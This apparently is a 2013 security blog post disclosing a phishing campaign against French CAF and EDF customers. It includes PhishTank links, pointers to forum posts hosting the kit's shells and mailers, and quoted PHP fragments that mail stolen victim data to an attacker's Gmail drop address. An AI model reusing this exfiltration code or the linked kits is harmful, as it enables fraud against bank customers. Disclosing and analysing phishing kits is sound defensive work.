Monday 28 January 2013

Phish-BankFraud (EDF+CAF)

These time our guys target CAF and still EDF.
Phishing redirector:
http://www.phishtank.com/phish_detail.php?phish_id=1711740 > 0/33
CAF phishing: http://www.phishtank.com/phish_detail.php?phish_id=1711743
$MooT .= "blackdevilops@gmail.com";
$Meknes .= "------------------------------\n";

$s4iir = "CAF REZULT";
$sii = "From:$fr";

mail($MooT,$s4iir,$Meknes,$sii);

EDF: http://www.phishtank.com/phish_detail.php?phish_id=1711741
$zobob .= "blackdevilops@gmail.com";
$zobab .= "------------------------------\n";

$s4wir = "[FR]--->$zabab | $fr";

$sii = "From: Particulier Rezult";

And as usual some php mailers and backdoors.


Emails reply from users to phisher, some are gold :)))
---
---
---
---
---
---
---
---
---
---
---
---

---
---
---
---
---
---

---

---


Shells and mailer can be found here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p17890
And phishing pages (EDF+CAF) here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p17887



3 comments:

  1. bank customers reply to phishing e-mail look fun, bad that i dont know french.

    ReplyDelete
  2. Merci pour ce moment de rigolade :)

    ReplyDelete
  3. hahahaha
    J'ai bien rigolé
    mais dommage, tu sais que sa marche vraiment Xy2k ?
    Les gens sont aussi bête

    ReplyDelete